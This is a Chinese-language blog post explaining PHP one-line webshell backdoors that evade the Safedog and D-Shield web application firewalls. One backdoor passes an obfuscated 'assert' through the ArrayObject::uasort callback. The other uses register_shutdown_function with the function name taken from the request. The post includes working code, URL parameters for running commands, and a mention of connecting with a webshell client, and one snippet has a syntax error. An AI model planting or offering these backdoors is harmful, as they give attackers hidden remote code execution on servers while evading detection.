关注我们

PHP回调后门Bypass大部分WAF(安全狗,D盾)等

adminadmin WAF绕过 2018-04-24 414 0

很多人分享过狗一句话,思路无非是构造动态函数类型的千变万化
但是万变不离其宗
这样虽然过狗但是D盾或者其他的WAF能检测出来,人肉眼也能看出来
那么,我就来分享回调方式的一句话,无任何特征

首先是小甜品:

ArrayObject::uasort
这个函数的作用是自定义函数进行比较数组。
他会比较全部的数组成员,并且每次进行两个数组成员进行比较。

过狗一句话:

  1. $Arr = new ArrayObject(array('1',$_REQUEST['pass']));

  2. $Rand = ('ass'.rand(1,9).'ert');

  3. $str = substr($Rand,0,3).substr($Rand,4,7);

  4. $Arr->uasort($str);

ArrayObject第一位可以随便写,但不能不写,因为只能第二位执行命令

安全狗正则是检测assert的,避开安全狗检测太简单了。
各家的WAF都测试过,D盾最强,噩梦般的强。安全狗个人觉得是WAF中比较low的了,随随便便就能过。当然只是说检测一句话方面。
好像跑题了。。。
过狗是在第二句和第三句
用随机数1到9分开assert
再用substr把中间的随机数去掉。
成功执行命令:

这个过狗

但是

等级5。明确指出这是后门。
迷之D盾正则…..检测的是uasort
所以说用这个函数当后门会被秒杀。。
那么如何无特征呢

那可以换个回调的函数
首先附上代码~

  1. $e = $_REQUEST['e'];

  2. $str = substr($e,0,3).substr($e,4,7);

  3. register_shutdown_function($str$_REQUEST['pass']);

执行代码截图思路:

首先$e传个参数
然后$str把传参中的第4位去掉最后用
register_shutdown_function()把函数参数传递后执行命令
无任何特征,无任何特征,无任何特征。

register_shutdown_function() 函数详解:函数可实现当程序执行完成后执行的函数,
其功能为可实现程序执行完成的后续操作。
程序在运行的时候可能存在执行超时,或强制关闭等情况,
PHP4后支持注册函数参数传递

网页执行命令:
女口:www.xxx.com/你的后门地址.php?e=ass~ert&pass=执行的php函数
示例:www.cracer.com/test.php?e=ass~ert&pass=phphinfo();
菜刀连接:


喜欢0评论已闭